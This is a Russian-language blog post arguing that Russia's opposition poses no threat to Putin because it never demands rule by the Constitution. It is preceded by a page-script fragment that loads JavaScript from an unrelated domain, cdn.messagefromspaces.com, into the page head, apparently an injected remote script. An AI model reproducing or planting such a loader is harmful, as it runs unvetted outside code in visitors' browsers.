, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
RSS
 

Почему Путину не страшны называющие себя «оппозиционерами»?

11 Мар

Прежде всего, из-за того, что они не могут предложить россиянам ничего, кроме своего самовластия.

Ни в одной оппозиционной программе нет цели, обеспечить волю народа, изложенную в Конституции России.

В стране  нет власти Конституции, обеспеченной её гарантом и правосудием, но никто из оппозиции не приводит фактов того, что гарант Конституции не исполняет свои обязанности.

На всех центральных каналах ТВ рассуждают о том, как обустроить Украину, но явное игнорирование чиновниками Конституции России, обсуждать опасаются либо такая работа никак не оплачивается из тех 20 млрд., что выделили из казны.

Организуя митинги, оппозиционеры  на баннерах размещают  надписи о чем угодно, только не о том, что осуществляющие государственную власть, не исполняют требования Конституции России  о « признании, соблюдении и защите прав и свобод человека и гражданина».

В стране ежегодно неправомерно осуждают 500−700 тысяч человек, на одном только признании предъявленного им обвинения, но за все эти годы я не видел баннера с призывом: «Прекратить пыточное судопроизводство, заставляющее назначенного обвиняемым брать на себя чужую вину».

Генеральный прокурор Юрий Чайка публично https://ria.ru/20140212/994496671.html  признаёт, что более 14 тысяч человек в России осуждены незаконно, что люди годами сидят незаконно».  Однако оппозиция на это никак не реагирует.

Вот уже и  сам гарант Конституции в  своём послании http://kremlin.ru/events/president/news/59863  с возмущением говорит: «Действительно, смотрите, человек сидит за решёткой, его ни разу в течение нескольких месяцев не вызывали на допрос. Прокурор спрашивает: «Почему на допрос не вызывали?» — «В отпуске был следователь».

И вот на это фактическое бессилие гаранта Конституции, оппозиция никак не реагирует.

Своими действиями оппозиция нам открыто демонстрирует то, что между людьми существует жесткое соперничество, что люди эгоистичны по своей природе, что каждый думает о собственном благе.

Поэтому называющие себя оппозиционерами не хотят привести свои отношения к тому порядку, что установился в обществе. Они навязывают обществу свой порядок.

Конституцию России оппозиционеры не считают волей народа, общественным договором. Для них, осуществляющие государственную власть, самовластвуют, создавая различные системы, основанные на личной преданности, а не на деловых качествах и способностях людей, входящих в систему.

В этой связи все усилия оппонентов направлены на доказывания ущербности созданной Путиным системы власти.

На самом деле большинство россиян,  живущих в стране, не эгоистичны. Они вполне разумные и добрые люди, естественным стремлением которых является порядок.

Именно поэтому, большинство россиян, в 1993 году согласилось с тем, что записано в Конституции России, передав часть своей власти полномочным лицам, осуществляющим государственную власть, чтобы они организовали жизнь общества наилучшим образом.

Но обеспечивать исполнение этого общественного договора «полномочным лицам» не удаётся уже третье десятилетие.

Причин этому  множество, но главнейшая из них та, что  нигде не учат, как обеспечить волю народа, изложенную в Конституции России. А самообразовываться не все умеют и желают.

Парадоксально, но на право управлять автомобилем,  учат три-пять месяцев, быть хорошим поваром — три года, хорошим юристом или врачом — восемь лет. А, как осуществлять государственную власть, не учат нигде.

Вот мы и видим среди осуществляющих государственную власть, спортсменов, бывших комсомольских работников, юристов, журналистов, которые ничего не знают о том, как осуществлять государственную власть.

Во власти  оказалось множество уважаемых по своей прошлой деятельности людей, но полностью неспособных осуществлять государственную власть.

Оппозиционерка Ксения Собчак, гордится тем, что её отец был одним из соавторов Конституции России, но, как оказалось, она  не понимает https://echo.msk.ru/blog/advokatvladimir/2339875-echo/   сути, изложенного в Основном Законе страны, а была официальным кандидатом на должность Президента России.

Неслучайно во Франции законодательную власть осуществляют только те, кто имеет юридическое образование.

Вот от таких неумех, осуществляющих государственную власть, мы и наблюдаем инициативы  давить свободу людей, держать всех в ежовых рукавицах и править безраздельно и безнаказанно, независимо от воли единственного источника власти в стране, многонационального народа.

Наличие Конституции в стране, этого общественного договора, с необходимостью требует людей,  способствующих тому, чтобы свободы не были ущемлены, чтобы люди могли реализовать свои права.

Главное — чтобы верховенствовали не чиновники, а законы,  работающие на благо общества. А  лица, осуществляющие государственную власть, неукоснительно следили за этим.

Если они плохо выполняют свою работу по обеспечению нормальной жизни общества, такие чиновники должны быть заменены гражданами на других, способных установить в стране власть Конституции, обеспеченную её гарантом и правосудием. Притом мирным путем, через выборы.

Но оппозиции с такими суждениями в России нет.

При таких обстоятельствах  Путин, конечно, уйдёт, но ему на смену придёт не власть Конституции, а самовластие  иного россиянина-обещалки.

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Оставить комментарий

Вы должны войти, чтобы оставить комментарий.